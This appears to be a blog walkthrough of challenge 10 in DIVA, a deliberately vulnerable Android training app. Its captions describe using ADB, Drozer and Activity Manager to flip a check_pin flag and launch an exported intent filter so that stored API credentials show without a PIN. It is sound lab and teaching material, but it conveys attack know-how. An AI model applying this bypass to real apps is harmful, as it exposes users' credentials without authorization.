Saturday, December 31, 2016

ANDROID PT - DIVA / 10 - Access Control Issues 2 - Intent Filter Vulnerability (2)


- Layout for this exercise:

- Connecting from Santoku to Nexus 5 with ADB:

- Launching the application: 

- Clicking the tab for challenge 10:

- The applications asks the user to register at a website in order to get a PIN, valid to login and see the content of some API credentials related to a third party application:

- Using a false PIN, the access is denied:

- The goal of this challenge would be to access the third party API credentials from outside the application, without using any PIN. 

- Looking at the AndroidManifest.xml, inside the activity for this challenge it is defined the intent filter jakhar.aseem.diva.action.VIEW_CREDS2:

- We could try using the Activity Manager and starting the intent filter, but it does not work because it just prompts the user for registering:

- However, using Drozer will be a lot more powerful. Setting up the Drozer server at Nexus 5:

- Launching the Drozer client at Linux Santoku:

- Running the info option, the activity APICreds2Activity is detected:

- Opening the Java source code of the activity APICreds2Activity:

- It is noticeable that a boolean is compared to the value "true", and then asked for registering at a website.

- Opening the for this challenge:

- So, as mentioned, a boolean is defined to validate the PIN entered by the user.

- Going to the code of the application, a string called check_pin is defined:

- Now, from Drozer the value of check_pin is changed from "true" to "false", and the intent filter started with Activity Manager in order to bypass the access control protection: 

- The result is successful because the API Credentials are now available for the user without entering any valid or invalid PIN: